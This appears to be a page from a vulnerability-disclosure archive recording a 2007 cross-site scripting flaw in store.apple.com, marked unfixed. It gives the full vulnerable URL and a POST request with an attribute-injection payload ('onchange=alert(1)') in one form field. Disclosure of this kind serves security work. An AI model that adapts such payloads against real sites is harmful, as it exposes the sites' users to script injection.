Security researcher 142TeeTH, has submitted on 13/05/2007 a cross-site-scripting (XSS) vulnerability affecting store.apple.com, which at the time of submission ranked 91 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/05/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 13/05/2007 |
Date published: 13/05/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: 142TeeTH |
Domain: store.apple.com |
Category: XSS |
Pagerank: 91 |
|---|
URL: https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/6854001/wo/BB5kzqJoRMsE27B33aC1junN
4x1/3.0.23.7.5.1.1.0.1 |
| POST: 0.23.7.5.1.1.0.1.13.1.7.2=a%40b.com&0.23.7.5.1.1.0.1.13.1.11.0=&0.23.7.5.1.1.0.1.13.1.17.0=&0.23.7.5 .1.1.0.1.13.1.19.3=&0.23.7.5.1.1.0.1.13.1.19.9=&0.23.7.5.1.1.0.1.13.1.19.15=0&0.23.7.5.1.1.0.1.13.1. 19.17=0&0.23.7.5.1.1.0.1.17.1.15.0.3.3.9=&0.23.7.5.1.1.0.1.17.1.15.0.3.3.11=%22+onchange%3D%22alert% 281%29&0.23.7.5.1.1.0.1.17.1.15.0.16.3=&0.23.7.5.1.1.0.1.17.1.15.0.16.5=&billingCityName=&0.23.7.5.1 .1.0.1.17.1.15.0.16.11.11=&0.23.7.5.1.1.0.1.17.1.15.0.16.11.13=&0.23.7.5.1.1.0.1.17.1.15.0.28.7.1=&0 .23.7.5.1.1.0.1.17.1.15.0.28.7.3=&0.23.7.5.1.1.0.1.17.1.15.0.28.7.7=&0.23.7.5.1.1.0.1.17.1.15.0.28.9 .7.1=&0.23.7.5.1.1.0.1.17.1.15.0.28.9.7.3=&0.23.7.5.1.1.0.1.17.1.19.1.0.3.3.9=&0.23.7.5.1.1.0.1.17.1 .19.1.0.3.3.11=&0.23.7.5.1.1.0.1.17.1.19.1.0.16.3=&0.23.7.5.1.1.0.1.17.1.19.1.0.16.5=&shippingCityNa me=&0.23.7.5.1.1.0.1.17.1.19.1.0.16.11.11=&0.23.7.5.1.1.0.1.17.1.19.1.0.16.11.13=&0.23.7.5.1.1.0.1.1 7.1.19.1.0.28.7.1=&0.23.7.5.1.1.0.1.17.1.19.1.0.28.7.3=&0.23.7.5.1.1.0.1.17.1.19.1.0.28.7.7=&shippin |
|
Click here to view the mirror
|
|
|
| 
